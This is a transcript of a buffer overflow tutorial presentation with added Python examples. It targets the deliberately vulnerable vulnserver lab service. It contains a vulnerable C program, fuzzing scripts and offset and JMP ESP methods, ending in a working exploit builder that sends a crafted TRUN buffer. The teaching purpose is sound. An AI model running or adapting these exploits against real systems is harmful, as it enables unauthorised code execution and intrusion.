Exploiting buffer overflows

Uploaded by: paul-dutot-ieng-miet-mbcs-citp-qstm-oscp

Posted on 16-Jul-2015

TRANSCRIPT

Page 1: Exploiting buffer overflows
Page 2: Exploiting buffer overflows

Disclaimer

@cyberkryption

The views expressed within this presentation or afterwards are my own and in no way represent my employer.

The following presentation describes how to conduct a buffer overflow attack.

These attacks are illegal to perform against systems that you do not have explicit permission to test.

I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations.

Caveat: With knowledge comes responsibility

Page 3: Exploiting buffer overflows

Who am I

@cyberkryption

Page 4: Exploiting buffer overflows

Who is This?

Page 5: Exploiting buffer overflows

Von Neumann Explained..

Extract from Engineer's minute at www.youtube.com/watch?v=5BpgAHBZgec

Page 6: Exploiting buffer overflows

Phrack 49

Page 7: Exploiting buffer overflows

Meet the Stack

Each program has its own stack as a memory structure.

Program data such as local variables are also saved on it, along with the return address of the function that is running.

Data is 'pushed' on to the stack and 'popped' off the stack.

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

Page 8: Exploiting buffer overflows

A Vulnerable 'C' program

#include <stdio.h>
#include <string.h>   /* strcpy() */

int main(int argc, char *argv[])
{
    char buff[20];                 /* 20 bytes reserved on the stack */
    if (argc < 2) {                /* keep the demo from crashing on a NULL argv[1] */
        printf("usage: %s <input>\n", argv[0]);
        return 1;
    }
    printf("copying into buffer\n");
    strcpy(buff, argv[1]);         /* no length check: this is the overflow */
    return 0;
}

We define a character array of 20 bytes; it reserves that much space on the stack.

We copy argv[1] into it with strcpy(), which never checks the size of the destination.

If we pass more than the buffer size (20 bytes) we get a buffer overflow!!!

Page 9: Exploiting buffer overflows

Stack Overwrite

Data on the stack is overwritten.

Extra input overwrites the data that sits above the buffer in the stack frame.

Eventually the saved return address is overwritten; when the function returns it is loaded into EIP, and we have control!!!

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

Page 10: Exploiting buffer overflows

Meet the CPU Registers & Pointers

CPU Pointers
EIP = Instruction Pointer. Points to the next instruction in memory to be executed
ESP = Stack Pointer. Points to the top of the stack
EBP = Base Pointer. Points to the base of the current stack frame

If we can overwrite EIP we can control execution flow; otherwise it is only a DoS.

CPU Registers
EAX = Accumulator
EBX = Base Register
ECX = Counter Register
EDX = Data Register

Page 11: Exploiting buffer overflows

Meet vulnserver

Page 12: Exploiting buffer overflows

Initial Fuzzing

#!/usr/bin/env python3
import socket

server = '192.168.1.65'     # vulnserver host
port = 9999                 # vulnserver listens on TCP 9999

# Length is entered per run and stepped up until vulnserver crashes in the debugger
length = int(input('Length of attack: '))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
print(s.recv(1024))         # welcome banner

print("Sending attack length", length, "to TRUN .")
attack = b'A' * length
s.send(b'TRUN .' + attack + b'\r\n')
print(s.recv(1024))         # no reply here: the service has probably crashed

s.send(b'EXIT\r\n')
print(s.recv(1024))
s.close()

Page 13: Exploiting buffer overflows

Initial Fuzzing - Video

Page 14: Exploiting buffer overflows

Initial Crash - Video

Page 15: Exploiting buffer overflows

Path to Victory

Determine buffer length. Any register pointing to the buffer? -> 'A' * 3000 crashes the service; ESP points into our buffer

Locate the EIP overwrite offset in the buffer. Enough space for shellcode? -> ????????

Determine a JMP ESP location -> ????????

Resolve any bad characters -> ????????

Page 16: Exploiting buffer overflows

EIP Hunting

#!/usr/bin/env python3
import socket

server = '192.168.1.65'
port = 9999

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
print(s.recv(1024))

print("Sending Evil Buffer to TRUN .")
attack = b'<insert cyclic pattern here>'   # the 3000-byte output of pattern_create.rb
s.send(b'TRUN .' + attack + b'\r\n')
print(s.recv(1024))

s.send(b'EXIT\r\n')
print(s.recv(1024))
s.close()

Page 17: Exploiting buffer overflows

EIP Hunting – Cyclic Pattern Crash

Page 18: Exploiting buffer overflows

How to Locate EIP Overwrite

● After the crash with the cyclic pattern, we find the bytes 396F4338 overwriting the EIP register

● Metasploit pattern_create.rb creates a cyclic pattern of 3000 non-repeating characters, so any 4 bytes taken from it identify one position

● Use convert.sh for HEX to ASCII conversion, remembering that x86 is little-endian: 396F4338 in EIP is "8Co9" in the buffer

● Lastly use pattern_offset.rb to find the EIP overwrite offset: 2006 bytes into the buffer
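As an added example, not part of the slides, here are the two Metasploit tools reimplemented in Python 3 so the lookup can be checked offline: pattern_create() builds the same Upper-lower-digit cyclic pattern as pattern_create.rb, and pattern_offset() does the little-endian conversion that convert.sh and pattern_offset.rb do by hand. The EIP value 396F4338 and the 3000-byte length are the ones from the slide; the function names are mine.

```python
import string
import struct


def pattern_create(length):
    """Build a Metasploit-style cyclic pattern of the requested length.

    Each 3-byte group is Upper + lower + digit, so the first 26*26*10*3 = 20280
    bytes contain no repeated 4-byte window: any 4 bytes that land in EIP map
    back to exactly one offset. Beyond 20280 bytes the pattern wraps, as
    pattern_create.rb does.
    """
    groups = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups += (upper + lower + digit).encode()
    repeats = length // len(groups) + 1
    return bytes(groups * repeats)[:length]


def pattern_offset(pattern, eip_hex):
    """Return the offset in pattern of the 4 bytes that ended up in EIP, or -1.

    The debugger shows EIP as a number (e.g. 396F4338); x86 is little-endian,
    so those bytes sat in the buffer in reverse order ('8Co9'). Like
    pattern_offset.rb, the byte order as printed is tried as a fallback in case
    the value was copied byte-for-byte from a memory dump instead.
    """
    value = int(eip_hex, 16)
    for fmt in ('<I', '>I'):
        offset = pattern.find(struct.pack(fmt, value))
        if offset != -1:
            return offset
    return -1


if __name__ == '__main__':
    pattern = pattern_create(3000)
    print(pattern[:24].decode())                 # Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7
    print(pattern_offset(pattern, '396F4338'))   # 2006
```

The offset returned counts from the start of the pattern, not from the start of what was sent, so the 'TRUN .' prefix must stay the same in every later script or the 2006 will be off by the change in prefix length.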

Page 19: Exploiting buffer overflows

Locating EIP Offset - Video

Page 20: Exploiting buffer overflows

EIP Hunting Part II

#!/usr/bin/env python3
import socket

server = '192.168.1.65'
sport = 9999

prefix = b'A' * 2006                  # everything up to the saved return address
eip = b'BBBB'                         # should show up in EIP as 42424242
padding = b'F' * (3000 - 2006 - 4)    # lands after the return address; ESP should point into it
attack = prefix + eip + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, sport))
print(s.recv(1024))
print("Sending Buffer to TRUN ")
s.send(b'TRUN .' + attack + b'\r\n')
print(s.recv(1024))
s.send(b'EXIT\r\n')
print(s.recv(1024))
s.close()

Page 21: Exploiting buffer overflows

EIP & Buffer Space Confirmed

EIP = 42424242 (our 'BBBB'), so offset 2006 is correct.

Buffer space after ESP = end of our 'F' padding minus ESP, read from the debugger = 980 bytes of room for shellcode.

Page 22: Exploiting buffer overflows

Path to Victory

Determine buffer length. Any register pointing to the buffer? -> 'A' * 3000 crashes the service; ESP points into our buffer

Locate the EIP overwrite offset in the buffer. Enough space for shellcode? -> EIP overwrite at offset 2006; 980 bytes of shellcode space after it

Buffer construction: 'A' * 2006 | EIP overwrite (4 bytes) | shellcode (980 bytes)

Determine a JMP ESP location -> ????????

Resolve any bad characters -> ????????

Page 23: Exploiting buffer overflows

Determining JMP ESP Memory Location
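Added example, not from the slides: scanning a module image for JMP ESP (FF E4) or the equivalent PUSH ESP; RET (54 C3) and discarding any address whose own bytes contain a bad character, since that address could never be sent in the EIP overwrite. The module bytes and base address are constructed so the script runs offline; the expected hit 625011AF is the slide's address in essfunc.dll. A real PE module needs its section table (or the debugger) to map file offsets to load addresses, which this toy image skips.

```python
import struct

JMP_ESP = b'\xff\xe4'        # x86 encoding of JMP ESP
PUSH_ESP_RET = b'\x54\xc3'   # PUSH ESP; RET: reaches ESP just the same


def address_is_clean(addr, bad_chars):
    """True if the little-endian encoding of addr contains no bad character."""
    return not any(b in bad_chars for b in struct.pack('<I', addr))


def find_jmp_esp(module_bytes, base_address, bad_chars=(0x00,)):
    """Return sorted addresses of usable JMP ESP / PUSH ESP; RET gadgets in a module.

    Assumes file offset == load offset (true for the toy image below only).
    Gadgets whose address would put a bad character into the EIP overwrite
    are dropped: the target would mangle the address before it was ever used.
    """
    found = []
    for gadget in (JMP_ESP, PUSH_ESP_RET):
        idx = module_bytes.find(gadget)
        while idx != -1:
            addr = base_address + idx
            if address_is_clean(addr, bad_chars):
                found.append(addr)
            idx = module_bytes.find(gadget, idx + 1)
    return sorted(found)


def toy_module():
    """Constructed stand-in for essfunc.dll: 0x300 bytes of INT3 filler with
    three gadgets planted at known offsets. Not the real module's contents."""
    base = 0x62501000
    image = bytearray(b'\xcc' * 0x300)
    image[0x000:0x002] = JMP_ESP        # 0x62501000: address contains 0x00, unusable
    image[0x1af:0x1b1] = JMP_ESP        # 0x625011AF: the slide's address
    image[0x20a:0x20c] = PUSH_ESP_RET   # 0x6250120A: usable unless 0x0A is bad
    return bytes(image), base


if __name__ == '__main__':
    image, base = toy_module()
    for addr in find_jmp_esp(image, base, bad_chars=(0x00, 0x0a, 0x0d)):
        print(f'{addr:08X}')           # 625011AF
```

The gadget has to live in a module that is loaded at the same address every time and is not protected against this kind of return, otherwise the hard-coded 625011AF works once in the debugger and never again.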

Page 24: Exploiting buffer overflows

Path to Victory

Determine buffer length. Any register pointing to the buffer? -> 'A' * 3000 crashes the service; ESP points into our buffer

Locate the EIP overwrite offset in the buffer. Enough space for shellcode? -> EIP overwrite at offset 2006; 980 bytes of shellcode space after it

Buffer construction: 'A' * 2006 | EIP overwrite (4 bytes) | shellcode (980 bytes)

Determine a JMP ESP location -> 625011AF in essfunc.dll

Resolve any bad characters -> ????????

Page 25: Exploiting buffer overflows

The Bad Character Problem

Hex   Dec  Description
----  ---  ---------------------------------------------
0x00    0  Null byte, terminates a C string
0x0A   10  Line feed, may terminate a command line
0x0D   13  Carriage return, may terminate a command line
0x20   32  Space, may terminate a command line argument

Bad characters are bytes the target mangles or stops at while handling our input, so the shellcode that reaches the stack is not the shellcode we sent. 0x00, for example, ends a C string: nothing after it is copied and our code never runs!!

Page 26: Exploiting buffer overflows

Determining Bad Characters

Page 27: Exploiting buffer overflows

Determining Bad Characters
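Added example (Python 3, not from the slides) of the procedure behind these two slides: build the test string of every byte value, send it in place of shellcode, then diff what the debugger shows at ESP against what was sent. The 'observed' bytes here are constructed to simulate a target that drops 0x0A and turns 0x0D into a space; in practice they are copied from the dump window after the crash, and the round is repeated with each newly found byte excluded until nothing changes.

```python
def bad_char_test_string(exclude=(0x00,)):
    """Every byte value 0x00..0xFF except the ones already known to be bad.

    0x00 is left out from the start: strcpy-style copies stop at it, so nothing
    after it would reach the stack and the whole test would be meaningless.
    """
    return bytes(b for b in range(256) if b not in exclude)


def find_bad_chars(sent, observed):
    """Diff the bytes sent against the bytes found in memory (follow ESP in the dump).

    Returns (bad, truncated_at): bad lists byte values that were replaced or
    dropped in transit; truncated_at is the first sent byte that never arrived
    (the copy stopped there), or None. A dropped byte shifts everything after
    it, so a plain byte-for-byte compare would flag every following byte; this
    walk re-synchronises instead.
    """
    bad = []
    i = j = 0
    while i < len(sent) and j < len(observed):
        if sent[i] == observed[j]:
            i += 1
            j += 1
            continue
        bad.append(sent[i])
        if i + 1 < len(sent) and observed[j] == sent[i + 1]:
            i += 1            # dropped: the next sent byte is already here
        else:
            i += 1            # replaced in place: step past both
            j += 1
    truncated_at = sent[i] if i < len(sent) else None
    return bad, truncated_at


def next_round(exclude, bad, truncated_at):
    """Bad characters accumulate across rounds: exclude what was found and
    whatever truncated the copy, then send the shorter string again."""
    new = set(exclude) | set(bad)
    if truncated_at is not None:
        new.add(truncated_at)
    return tuple(sorted(new))


if __name__ == '__main__':
    sent = bad_char_test_string()
    # Constructed dump: the target drops 0x0A and turns 0x0D into a space (0x20)
    observed = sent.replace(b'\x0a', b'').replace(b'\x0d', b'\x20')
    bad, truncated_at = find_bad_chars(sent, observed)
    print([hex(b) for b in bad], truncated_at)      # ['0xa', '0xd'] None
    print(next_round((0x00,), bad, truncated_at))   # (0, 10, 13)
```

A truncation is the important failure mode: if the dump simply ends partway through the string, every byte after the cut is still unknown, so that byte is excluded and the round is repeated rather than declaring the rest clean.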

Page 28: Exploiting buffer overflows

Path to Victory

Determine buffer length. Any register pointing to the buffer? -> 'A' * 3000 crashes the service; ESP points into our buffer

Locate the EIP overwrite offset in the buffer. Enough space for shellcode? -> EIP overwrite at offset 2006; 980 bytes of shellcode space after it

Buffer construction: 'A' * 2006 | EIP overwrite (4 bytes) | shellcode (980 bytes)

Determine a JMP ESP location -> 625011AF in essfunc.dll

Resolve any bad characters -> 0x00

Page 29: Exploiting buffer overflows

Lets Create some Shellcode

Page 30: Exploiting buffer overflows

Final Buffer Structure & Operation

Buffer: 'A' * 2006 | EIP overwrite = 625011AF | NOP sled | Shellcode

Buffer overflow starts here: the 'A' * 2006 fill the stack up to the saved return address

Execution redirected to 625011AF

JMP ESP at 625011AF redirects into the NOP sled

Shellcode runs

Test shellcode: a \xCC (INT3) breakpoint. "Breakpoint activated" in the debugger confirms the whole chain works before real shellcode goes in
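The slide's layout put into code, as an added example (Python 3, not the presentation's own script): build_exploit() assembles 'A' * 2006 | JMP ESP address | NOP sled | shellcode, packs the address little-endian and refuses to build a buffer that contains a bad character or exceeds the 980 bytes measured after ESP. send_trun() delivers it over the TRUN command exactly as the earlier scripts do; the host and port are the slides' 192.168.1.65:9999, and the INT3 test shellcode is the slide's \xCC.

```python
import socket
import struct

NOP = b'\x90'
INT3 = b'\xcc'            # breakpoint: the slide's test "shellcode"


def build_exploit(offset, jmp_esp, shellcode, nop_sled=16, space=980, bad_chars=(0x00,)):
    """Assemble prefix | EIP overwrite | NOP sled | shellcode.

    offset    bytes before the saved return address (2006 for TRUN)
    jmp_esp   address of a JMP ESP gadget (0x625011AF in essfunc.dll)
    space     bytes available after ESP as measured in the debugger (980)
    Raises ValueError instead of producing a buffer that cannot work.
    """
    eip = struct.pack('<I', jmp_esp)          # little-endian: lands in EIP on RET
    payload = NOP * nop_sled + shellcode
    if len(payload) > space:
        raise ValueError(f'payload is {len(payload)} bytes, only {space} available after ESP')
    bad = sorted({b for b in eip + payload if b in bad_chars})
    if bad:
        raise ValueError('bad characters in buffer: ' + ', '.join(f'0x{b:02x}' for b in bad))
    return b'A' * offset + eip + payload


def split_exploit(buf, offset):
    """Break a built buffer into (prefix, eip, payload) to compare with the debugger view."""
    return buf[:offset], buf[offset:offset + 4], buf[offset + 4:]


def send_trun(buf, host='192.168.1.65', port=9999):
    """Deliver the buffer over vulnserver's TRUN command, as the earlier scripts do."""
    with socket.create_connection((host, port)) as s:
        s.recv(1024)                           # banner
        s.sendall(b'TRUN .' + buf + b'\r\n')
        return s.recv(1024)                    # no reply: the breakpoint fired


if __name__ == '__main__':
    buf = build_exploit(2006, 0x625011AF, INT3 * 4)
    prefix, eip, payload = split_exploit(buf, 2006)
    print(len(prefix), eip.hex())              # 2006 af115062
    send_trun(buf)
```

Once the INT3 run stops in the debugger at the first \xCC, the real shellcode replaces INT3 * 4; the same checks then catch any 0x00 the shellcode generator left in and any payload too long for the 980 bytes.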

Page 31: Exploiting buffer overflows

Putting it all together

Page 32: Exploiting buffer overflows

CVE-2012-5958 / CVE-2012-5959

Page 33: Exploiting buffer overflows

CVE-2012-5958 / CVE-2012-5959

Page 34: Exploiting buffer overflows

Questions ????

TWITTER: @cyberkryption

BLOG: cyberkryption.wordpress.com